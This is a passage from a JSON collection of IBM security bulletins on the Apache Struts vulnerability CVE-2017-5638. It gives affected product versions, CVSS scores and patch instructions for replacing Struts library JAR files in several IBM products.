$EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) 2.4 On each management host, unzip the struts-2.3.32-lib.zip package and copy the following files to your cluster directory: **\\- For IBM Platform Symphony 
7.1.1:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-json-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp 
commons-lang3-3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-json-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) 2.5 Clean up the GUI work directories on all management hosts: > rm -rf $EGO_TOP/gui/work/* \n> rm -rf $EGO_TOP/gui/workarea/* \n**NOTE: **If you changed the default configuration for the WLP_OUTPUT_DIR environment variable and the APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR parameter is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/webgui_hostname/gui/workarea/ directory. 2.6 Launch a web browser and clear your browser\u2019s cache. 
\n2.7 Start the WEBGUI service: > egosh service start WEBGUI\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:45", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:45", "id": "02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "href": "https://www.ibm.com/support/pages/node/631039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T18:21:24", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and FlashSystem\u2122 900 is susceptible. 
An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2. 
\n \nCode versions affected include supported VRMFs: \n\u00b7 1.4.0.0 \u2013 1.4.6.0 \n\u00b7 1.3.0.0 \u2013 1.3.0.7\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 & \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 & \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___ Fixed code VRMF .__ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_| _ __N/A_| [**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central_ _ \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-02-18T01:45:50", "id": "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "href": "https://www.ibm.com/support/pages/node/697155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:21", "description": "## Summary\n\nAn Apache Struts vulnerability of arbitrary code execution was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) **DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. 
CVSS Base Score: 7.3 CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_Platform Cluster Manager Standard Edition_| _4.1.0, 4.1.1, 4.1.1.1, 4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform Cluster Manager Advanced Edition_| _4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform HPC_| _4.1.1, 4.1.1.1, 4.2.0, 4.2.1_| _None_| _See workaround_ \n_Spectrum Cluster Foundation_| _4.2.2_| _None_| _See workaround_ \n \n## Workarounds and Mitigations\n\nPlatform Cluster Manager 4.2.1 & Platform HPC 4.2.1 & Spectrum Cluster Foundation 4.2.2 \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.32/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. 
\n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n4 Restart Platform HPC services. 
If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x** \n \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n4 # mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n \n5 Restart 
Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n# pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI \n# pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x** \n1 Download the struts-2.3.32-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip \n# cd struts-2.3.32/lib/ \n# cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n4 Restart 
Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual \n# pmcadmin stop \n# pmcadmin start \n# pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pmcadmin stop \n# pmcadmin start \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open Source Apache Struts Vulnerabilities Collections and take appropriate mitigation and remediation actions. \n \n \n**Important note:** IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. 
IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:33", "type": "ibm", "title": "Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:33", "id": "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "href": "https://www.ibm.com/support/pages/node/630909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:08", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. 
An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Products and Versions of FlashSystem V840\u2019s two node types** \n \n_Storage Node_ \n- Machine Type Models (MTMs) affected include 9846-AE1 and 9848-AE1 \n- Code versions affected include supported VRMFs: \n  - 1.4.0.0 \u2013 1.4.6.0 \n  - 1.3.0.0 \u2013 1.3.0.7 \n \n_Controller Node_ \n- MTMs affected include 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1 \n- Code versions affected include supported VRMFs: \n  - 7.8.0.0 \u2013 7.8.0.2 \n  - 7.7.0.0 \u2013 7.7.1.5\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** 9846-AE1 & 9848-AE1; **Controller nodes:** 9846-AC0, 9846-AC1, 9848-AC0, & 9848-AC1| Code fixes are now available; the minimum VRMF containing the fix depends on the code stream. _Storage Node VRMF_: 1.4 stream: 1.4.6.1; 1.3 stream: 1.3.0.8. _Controller Node VRMF_: 7.8 stream: 7.8.1.0; 7.7 stream: 7.7.1.6| N/A| [**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>) for storage and controller node are available @ IBM\u2019s Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:32:46", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:32:46", "id": "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "href": "https://www.ibm.com/support/pages/node/697157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T09:36:02", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of Storwize V7000 Unified allowing arbitrary code execution. 
The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.x and 1.6.0.0 to 1.6.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.6.2.2 of IBM Storwize V7000 Unified. Version 1.5 is end of service. Customers running on this release of IBM Storwize V7000 Unified can upgrade to v1.6.2.2 for a fix. 
\n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:34:31", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:34:31", "id": "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "href": "https://www.ibm.com/support/pages/node/697609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:33", "description": "## Summary\n\nIBM Sterling Order Management 
uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. 
